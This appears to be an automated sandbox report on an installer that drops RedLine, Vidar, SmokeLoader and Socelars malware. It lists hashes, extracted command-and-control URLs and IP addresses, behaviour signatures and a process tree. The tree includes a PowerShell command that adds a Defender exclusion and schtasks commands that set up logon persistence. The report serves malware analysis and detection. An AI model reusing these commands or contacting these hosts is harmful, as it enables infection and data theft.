Analysis
-
max time kernel
21s -
max time network
162s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
13-09-2021 13:00
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win10-en
Errors
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
7279aeead22b91c8176ee932377f2e27
-
SHA1
169aa33bbaacff9d2b1fbef2a8d06456d14c81dc
-
SHA256
8485c644c0a96ff0d9256b10e2c50ee462868432080b6f27869d96edf77a7d0e
-
SHA512
8ddaa2cd804602c0fdde5a85c96067b19338d074980fd0350839e68fea9b113d55af056a3ac3cbb04c47b9ef819c4840031a9fcb817d7a45bb2e35d0184d7697
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
129f4t
185.215.113.104:18754
Extracted
redline
UTS
45.9.20.20:13441
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4244 4888 rundll32.exe 121 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6108 4888 rundll32.exe 121 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 4888 rundll32.exe 121 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6620 4888 schtasks.exe 121 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral3/memory/3316-289-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral3/memory/3316-290-0x000000000041C5DA-mapping.dmp family_redline behavioral3/memory/2972-303-0x0000000003390000-0x00000000033AF000-memory.dmp family_redline behavioral3/memory/2972-307-0x0000000003550000-0x000000000356E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral3/files/0x000100000001ab45-149.dat family_socelars behavioral3/files/0x000100000001ab45-167.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral3/memory/3228-203-0x00000000034F0000-0x00000000035C1000-memory.dmp family_vidar behavioral3/memory/3228-201-0x0000000000400000-0x00000000017F4000-memory.dmp family_vidar -
resource yara_rule behavioral3/files/0x000100000001ab3f-121.dat aspack_v212_v242 behavioral3/files/0x000100000001ab3f-123.dat aspack_v212_v242 behavioral3/files/0x000100000001ab3e-122.dat aspack_v212_v242 behavioral3/files/0x000100000001ab3e-128.dat aspack_v212_v242 behavioral3/files/0x000100000001ab3e-127.dat aspack_v212_v242 behavioral3/files/0x000100000001ab41-126.dat aspack_v212_v242 behavioral3/files/0x000100000001ab41-131.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 30 IoCs
pid Process 4840 setup_installer.exe 4904 setup_install.exe 4208 Sun15d8dfe2c6d17.exe 4008 Sun150faeb3537d.exe 4228 Sun1584240df9fe73a3.exe 4248 Sun157a449716c8ee483.exe 4284 Sun15b61bf18b0f1.exe 4268 Sun152260a303c33a7.exe 4252 Sun15223697c98.exe 3228 Sun150d896340a863.exe 3196 Sun157ff8e4440aa.exe 500 Sun15b61bf18b0f1.tmp 2372 LzmwAqmV.exe 2792 5047182.exe 3980 Chrome 5.exe 4076 PublicDwlBrowser1100.exe 3836 737992.exe 4576 2.exe 4660 setup.exe 2972 udptest.exe 4724 setup_2.exe 4044 46807GHF____.exe 648 3002.exe 5028 setup_2.tmp 4276 jhuuee.exe 3232 1271845.exe 3316 1271845.exe 3320 svchost.exe 4760 BearVpn 3.exe 3296 1650891.exe -
Loads dropped DLL 9 IoCs
pid Process 4904 setup_install.exe 4904 setup_install.exe 4904 setup_install.exe 4904 setup_install.exe 4904 setup_install.exe 4904 setup_install.exe 4904 setup_install.exe 500 Sun15b61bf18b0f1.tmp 5028 setup_2.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 737992.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 192 ipinfo.io 278 ipinfo.io 297 ipinfo.io 412 ipinfo.io 94 ip-api.com 143 ipinfo.io 145 ipinfo.io 173 ipinfo.io 7 ip-api.com 411 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3232 set thread context of 3316 3232 1271845.exe 112 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
pid pid_target Process procid_target 5096 4576 WerFault.exe 98 4272 4248 WerFault.exe 83 2764 4660 WerFault.exe 99 4036 3232 WerFault.exe 108 4848 4248 WerFault.exe 83 4692 4660 WerFault.exe 99 3952 4248 WerFault.exe 83 3468 4660 WerFault.exe 99 2376 4660 WerFault.exe 99 4728 4660 WerFault.exe 99 5012 4248 WerFault.exe 83 3340 4660 WerFault.exe 99 5736 4248 WerFault.exe 83 5868 4248 WerFault.exe 83 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun15223697c98.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun15223697c98.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun15223697c98.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4004 schtasks.exe 5136 schtasks.exe 1208 schtasks.exe 7692 schtasks.exe 7144 schtasks.exe 6620 schtasks.exe 7424 schtasks.exe 2292 schtasks.exe 9372 schtasks.exe 6732 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4712 timeout.exe -
Kills process with taskkill 11 IoCs
pid Process 4668 taskkill.exe 8220 taskkill.exe 9040 taskkill.exe 6536 taskkill.exe 5460 taskkill.exe 7344 taskkill.exe 7368 taskkill.exe 972 taskkill.exe 9292 taskkill.exe 8728 taskkill.exe 4192 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun150faeb3537d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun150faeb3537d.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 8232 PING.EXE 9340 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 144 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 150 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 172 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4252 Sun15223697c98.exe 4252 Sun15223697c98.exe 4200 powershell.exe 4200 powershell.exe 4200 powershell.exe 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 4200 powershell.exe 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 5096 WerFault.exe 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 5096 WerFault.exe 5096 WerFault.exe 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 2900 Process not Found 4036 WerFault.exe 4036 WerFault.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4252 Sun15223697c98.exe -
Suspicious use of AdjustPrivilegeToken 52 IoCs
description pid Process Token: SeCreateTokenPrivilege 4008 Sun150faeb3537d.exe Token: SeAssignPrimaryTokenPrivilege 4008 Sun150faeb3537d.exe Token: SeLockMemoryPrivilege 4008 Sun150faeb3537d.exe Token: SeIncreaseQuotaPrivilege 4008 Sun150faeb3537d.exe Token: SeMachineAccountPrivilege 4008 Sun150faeb3537d.exe Token: SeTcbPrivilege 4008 Sun150faeb3537d.exe Token: SeSecurityPrivilege 4008 Sun150faeb3537d.exe Token: SeTakeOwnershipPrivilege 4008 Sun150faeb3537d.exe Token: SeLoadDriverPrivilege 4008 Sun150faeb3537d.exe Token: SeSystemProfilePrivilege 4008 Sun150faeb3537d.exe Token: SeSystemtimePrivilege 4008 Sun150faeb3537d.exe Token: SeProfSingleProcessPrivilege 4008 Sun150faeb3537d.exe Token: SeIncBasePriorityPrivilege 4008 Sun150faeb3537d.exe Token: SeCreatePagefilePrivilege 4008 Sun150faeb3537d.exe Token: SeCreatePermanentPrivilege 4008 Sun150faeb3537d.exe Token: SeBackupPrivilege 4008 Sun150faeb3537d.exe Token: SeRestorePrivilege 4008 Sun150faeb3537d.exe Token: SeShutdownPrivilege 4008 Sun150faeb3537d.exe Token: SeDebugPrivilege 4008 Sun150faeb3537d.exe Token: SeAuditPrivilege 4008 Sun150faeb3537d.exe Token: SeSystemEnvironmentPrivilege 4008 Sun150faeb3537d.exe Token: SeChangeNotifyPrivilege 4008 Sun150faeb3537d.exe Token: SeRemoteShutdownPrivilege 4008 Sun150faeb3537d.exe Token: SeUndockPrivilege 4008 Sun150faeb3537d.exe Token: SeSyncAgentPrivilege 4008 Sun150faeb3537d.exe Token: SeEnableDelegationPrivilege 4008 Sun150faeb3537d.exe Token: SeManageVolumePrivilege 4008 Sun150faeb3537d.exe Token: SeImpersonatePrivilege 4008 Sun150faeb3537d.exe Token: SeCreateGlobalPrivilege 4008 Sun150faeb3537d.exe Token: 31 4008 Sun150faeb3537d.exe Token: 32 4008 Sun150faeb3537d.exe Token: 33 4008 Sun150faeb3537d.exe Token: 34 4008 Sun150faeb3537d.exe Token: 35 4008 Sun150faeb3537d.exe Token: SeDebugPrivilege 3196 Sun157ff8e4440aa.exe Token: SeDebugPrivilege 4228 Sun1584240df9fe73a3.exe Token: SeDebugPrivilege 4200 powershell.exe Token: SeDebugPrivilege 2792 5047182.exe Token: SeDebugPrivilege 4576 2.exe Token: SeDebugPrivilege 4076 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 3232 1271845.exe Token: SeDebugPrivilege 3320 svchost.exe Token: SeDebugPrivilege 5096 WerFault.exe Token: SeRestorePrivilege 4272 WerFault.exe Token: SeBackupPrivilege 4272 WerFault.exe Token: SeBackupPrivilege 4272 WerFault.exe Token: SeShutdownPrivilege 2900 Process not Found Token: SeCreatePagefilePrivilege 2900 Process not Found Token: SeDebugPrivilege 4036 WerFault.exe Token: SeDebugPrivilege 2764 setup_2.tmp Token: SeDebugPrivilege 4272 WerFault.exe Token: SeDebugPrivilege 4760 BearVpn 3.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4796 wrote to memory of 4840 4796 setup_x86_x64_install.exe 68 PID 4796 wrote to memory of 4840 4796 setup_x86_x64_install.exe 68 PID 4796 wrote to memory of 4840 4796 setup_x86_x64_install.exe 68 PID 4840 wrote to memory of 4904 4840 setup_installer.exe 69 PID 4840 wrote to memory of 4904 4840 setup_installer.exe 69 PID 4840 wrote to memory of 4904 4840 setup_installer.exe 69 PID 4904 wrote to memory of 5072 4904 setup_install.exe 72 PID 4904 wrote to memory of 5072 4904 setup_install.exe 72 PID 4904 wrote to memory of 5072 4904 setup_install.exe 72 PID 4904 wrote to memory of 5084 4904 setup_install.exe 73 PID 4904 wrote to memory of 5084 4904 setup_install.exe 73 PID 4904 wrote to memory of 5084 4904 setup_install.exe 73 PID 4904 wrote to memory of 5100 4904 setup_install.exe 76 PID 4904 wrote to memory of 5100 4904 setup_install.exe 76 PID 4904 wrote to memory of 5100 4904 setup_install.exe 76 PID 4904 wrote to memory of 4104 4904 setup_install.exe 75 PID 4904 wrote to memory of 4104 4904 setup_install.exe 75 PID 4904 wrote to memory of 4104 4904 setup_install.exe 75 PID 4904 wrote to memory of 3272 4904 setup_install.exe 74 PID 4904 wrote to memory of 3272 4904 setup_install.exe 74 PID 4904 wrote to memory of 3272 4904 setup_install.exe 74 PID 4904 wrote to memory of 1448 4904 setup_install.exe 77 PID 4904 wrote to memory of 1448 4904 setup_install.exe 77 PID 4904 wrote to memory of 1448 4904 setup_install.exe 77 PID 4904 wrote to memory of 1520 4904 setup_install.exe 78 PID 4904 wrote to memory of 1520 4904 setup_install.exe 78 PID 4904 wrote to memory of 1520 4904 setup_install.exe 78 PID 4904 wrote to memory of 3600 4904 setup_install.exe 80 PID 4904 wrote to memory of 3600 4904 setup_install.exe 80 PID 4904 wrote to memory of 3600 4904 setup_install.exe 80 PID 4904 wrote to memory of 3468 4904 setup_install.exe 79 PID 4904 wrote to memory of 3468 4904 setup_install.exe 79 PID 4904 wrote to memory of 3468 4904 setup_install.exe 79 PID 4904 wrote to memory of 3708 4904 setup_install.exe 81 PID 4904 wrote to memory of 3708 4904 setup_install.exe 81 PID 4904 wrote to memory of 3708 4904 setup_install.exe 81 PID 5072 wrote to memory of 4200 5072 cmd.exe 82 PID 5072 wrote to memory of 4200 5072 cmd.exe 82 PID 5072 wrote to memory of 4200 5072 cmd.exe 82 PID 5100 wrote to memory of 4208 5100 cmd.exe 92 PID 5100 wrote to memory of 4208 5100 cmd.exe 92 PID 5100 wrote to memory of 4208 5100 cmd.exe 92 PID 3468 wrote to memory of 4228 3468 cmd.exe 91 PID 3468 wrote to memory of 4228 3468 cmd.exe 91 PID 3600 wrote to memory of 4008 3600 cmd.exe 90 PID 3600 wrote to memory of 4008 3600 cmd.exe 90 PID 3600 wrote to memory of 4008 3600 cmd.exe 90 PID 1448 wrote to memory of 4252 1448 cmd.exe 89 PID 1448 wrote to memory of 4252 1448 cmd.exe 89 PID 1448 wrote to memory of 4252 1448 cmd.exe 89 PID 3708 wrote to memory of 4248 3708 cmd.exe 83 PID 3708 wrote to memory of 4248 3708 cmd.exe 83 PID 3708 wrote to memory of 4248 3708 cmd.exe 83 PID 5084 wrote to memory of 4268 5084 cmd.exe 88 PID 5084 wrote to memory of 4268 5084 cmd.exe 88 PID 3272 wrote to memory of 4284 3272 cmd.exe 84 PID 3272 wrote to memory of 4284 3272 cmd.exe 84 PID 3272 wrote to memory of 4284 3272 cmd.exe 84 PID 1520 wrote to memory of 3196 1520 cmd.exe 87 PID 1520 wrote to memory of 3196 1520 cmd.exe 87 PID 4104 wrote to memory of 3228 4104 cmd.exe 86 PID 4104 wrote to memory of 3228 4104 cmd.exe 86 PID 4104 wrote to memory of 3228 4104 cmd.exe 86 PID 4284 wrote to memory of 500 4284 Sun15b61bf18b0f1.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152260a303c33a7.exe4⤵
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun152260a303c33a7.exeSun152260a303c33a7.exe5⤵
- Executes dropped EXE
PID:4268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15b61bf18b0f1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun15b61bf18b0f1.exeSun15b61bf18b0f1.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Users\Admin\AppData\Local\Temp\is-DL02G.tmp\Sun15b61bf18b0f1.tmp"C:\Users\Admin\AppData\Local\Temp\is-DL02G.tmp\Sun15b61bf18b0f1.tmp" /SL5="$3005E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8E21D034\Sun15b61bf18b0f1.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:500 -
C:\Users\Admin\AppData\Local\Temp\is-VUMVC.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-VUMVC.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Executes dropped EXE
PID:4044 -
C:\Program Files\Windows Photo Viewer\KQMTQXRSXN\ultramediaburner.exe"C:\Program Files\Windows Photo Viewer\KQMTQXRSXN\ultramediaburner.exe" /VERYSILENT8⤵PID:4508
-
C:\Users\Admin\AppData\Local\Temp\is-TDTRN.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-TDTRN.tmp\ultramediaburner.tmp" /SL5="$202BC,281924,62464,C:\Program Files\Windows Photo Viewer\KQMTQXRSXN\ultramediaburner.exe" /VERYSILENT9⤵PID:5676
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:4728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\34-304a2-ecc-35fbc-2df30a417f7f4\Nalogoreqa.exe"C:\Users\Admin\AppData\Local\Temp\34-304a2-ecc-35fbc-2df30a417f7f4\Nalogoreqa.exe"8⤵PID:4208
-
-
C:\Users\Admin\AppData\Local\Temp\10-860e3-98b-789b4-f02fef6b6d125\Kipimoqebu.exe"C:\Users\Admin\AppData\Local\Temp\10-860e3-98b-789b4-f02fef6b6d125\Kipimoqebu.exe"8⤵PID:5968
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cyl54khb.w5j\LivelyScreenRecJ10.exe & exit9⤵PID:4340
-
C:\Users\Admin\AppData\Local\Temp\cyl54khb.w5j\LivelyScreenRecJ10.exeC:\Users\Admin\AppData\Local\Temp\cyl54khb.w5j\LivelyScreenRecJ10.exe10⤵PID:6232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g0cpcvgj.ofa\GcleanerEU.exe /eufive & exit9⤵PID:6636
-
C:\Users\Admin\AppData\Local\Temp\g0cpcvgj.ofa\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\g0cpcvgj.ofa\GcleanerEU.exe /eufive10⤵PID:6812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bff3ocme.xpj\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:6932
-
C:\Users\Admin\AppData\Local\Temp\bff3ocme.xpj\installer.exeC:\Users\Admin\AppData\Local\Temp\bff3ocme.xpj\installer.exe /qn CAMPAIGN="654"10⤵PID:7080
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\bff3ocme.xpj\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\bff3ocme.xpj\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631285987 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:500
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1qaxckm5.q04\SmartPDF.exe & exit9⤵PID:7160
-
C:\Users\Admin\AppData\Local\Temp\1qaxckm5.q04\SmartPDF.exeC:\Users\Admin\AppData\Local\Temp\1qaxckm5.q04\SmartPDF.exe10⤵PID:800
-
C:\Users\Admin\AppData\Local\Temp\is-4BOGF.tmp\SmartPDF.tmp"C:\Users\Admin\AppData\Local\Temp\is-4BOGF.tmp\SmartPDF.tmp" /SL5="$3021E,138429,56832,C:\Users\Admin\AppData\Local\Temp\1qaxckm5.q04\SmartPDF.exe"11⤵PID:4480
-
C:\Users\Admin\AppData\Local\Temp\is-ULD73.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-ULD73.tmp\Setup.exe" /Verysilent12⤵PID:5768
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"13⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\Live2.exe"C:\Users\Admin\AppData\Local\Temp\Live2.exe"14⤵PID:3272
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent13⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\is-ID3D0.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-ID3D0.tmp\stats.tmp" /SL5="$20540,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent14⤵PID:6228
-
C:\Users\Admin\AppData\Local\Temp\is-0T8OP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0T8OP.tmp\Setup.exe" /Verysilent15⤵PID:7192
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit16⤵PID:6812
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'17⤵
- Creates scheduled task(s)
PID:7424
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"16⤵PID:5700
-
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"16⤵PID:8568
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit17⤵PID:10100
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'18⤵
- Creates scheduled task(s)
PID:6732
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cylcun2x.zrn\anyname.exe & exit9⤵PID:5960
-
C:\Users\Admin\AppData\Local\Temp\cylcun2x.zrn\anyname.exeC:\Users\Admin\AppData\Local\Temp\cylcun2x.zrn\anyname.exe10⤵PID:5880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4gmjo2y5.avq\BsInstFile.exe & exit9⤵PID:6340
-
C:\Users\Admin\AppData\Local\Temp\4gmjo2y5.avq\BsInstFile.exeC:\Users\Admin\AppData\Local\Temp\4gmjo2y5.avq\BsInstFile.exe10⤵PID:1680
-
C:\ProgramData\6285514.exe"C:\ProgramData\6285514.exe"11⤵PID:6704
-
-
C:\ProgramData\2286636.exe"C:\ProgramData\2286636.exe"11⤵PID:6724
-
-
C:\ProgramData\3373770.exe"C:\ProgramData\3373770.exe"11⤵PID:7124
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u1geyvms.l4o\install.exe & exit9⤵PID:6612
-
C:\Users\Admin\AppData\Local\Temp\u1geyvms.l4o\install.exeC:\Users\Admin\AppData\Local\Temp\u1geyvms.l4o\install.exe10⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\7zS4B52.tmp\SimplInst.exe.\SimplInst.exe11⤵PID:3992
-
C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\SimplInst.exe.\SimplInst.exe /S /site_id "216660"12⤵PID:6492
-
